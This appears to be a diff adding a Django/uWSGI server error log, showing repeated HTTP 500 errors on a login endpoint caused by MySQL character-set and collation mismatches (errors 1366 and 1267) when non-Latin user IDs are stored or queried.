+[pid: 2069|app: 0|req: 90/143] 219.228.146.146 () {48 vars in 970 bytes} [Thu Jan 14 07:44:19 2021] POST /login/ => generated 209531 bytes in 103 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 91/144] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:27 2021] POST /login/ => generated 209413 bytes in 106 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 93/145] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:27 2021] POST /login/ => generated 209413 bytes in 148 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 94/146] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:28 2021] POST /login/ => generated 209413 bytes in 159 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 245, in login
+ models.User.objects.create(uid=uid, password=pwd)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\x83\\xB3\\xE5\\x90\\x83...' for column 'uid' at row 1")
+[pid: 2069|app: 0|req: 94/147] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:28 2021] POST /login/ => generated 209413 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 233, in login
+ if len(models.User.objects.filter(uid=uid, password=pwd)) != 0:
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__
+ self._fetch_all()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all
+ self._result_cache = list(self._iterable_class(self))
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__
+ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='")
+[pid: 2069|app: 0|req: 95/148] 219.228.146.146 () {48 vars in 970 bytes} [Thu Jan 14 07:44:30 2021] POST /login/ => generated 183444 bytes in 86 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /login/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
